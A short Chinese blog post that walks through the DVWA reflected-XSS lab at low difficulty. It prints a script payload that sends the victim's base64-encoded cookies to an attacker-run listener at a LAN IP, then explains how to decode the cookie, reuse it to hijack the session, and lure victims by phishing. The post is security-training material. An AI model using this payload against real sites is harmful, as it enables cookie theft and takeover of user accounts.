dvwa xss reflected (low)

  1. 开启一个简易的http服务(我用了kali)

    2.插入Payload
<script>
    window.open('http://192.168.1.105:1234/?cookie='+btoa(document.cookie))
</script>


3.受害者访问攻击者插入xss代码的网页,浏览器就会加载插入的JavaScript代码,打开新网页的时候可能会被拦截,注意将其通过

4.攻击者启动的Web服务成功接收到受害者浏览器发出的请求并将url里的参数值记录下来。

5. 解码获取的cookie信息

6. 依据获取的cookie信息访问web页面,更改cookie信息之后可以直接跳转到访问的网站;

注意:
受害者用户退出登录之后cookie就会失效
如果使用反射型XSS,需要使用钓鱼的方式引诱受害者添加脚本;使用存储型XSS只要成功添加,所有访问过网页的用户cookie都会发送到攻击侧

posted @   小圣爱学习  阅读(2)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 【自荐】一款简洁、开源的在线白板工具 Drawnix
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
· Docker 太简单,K8s 太复杂?w7panel 让容器管理更轻松!
点击右上角即可分享
微信分享提示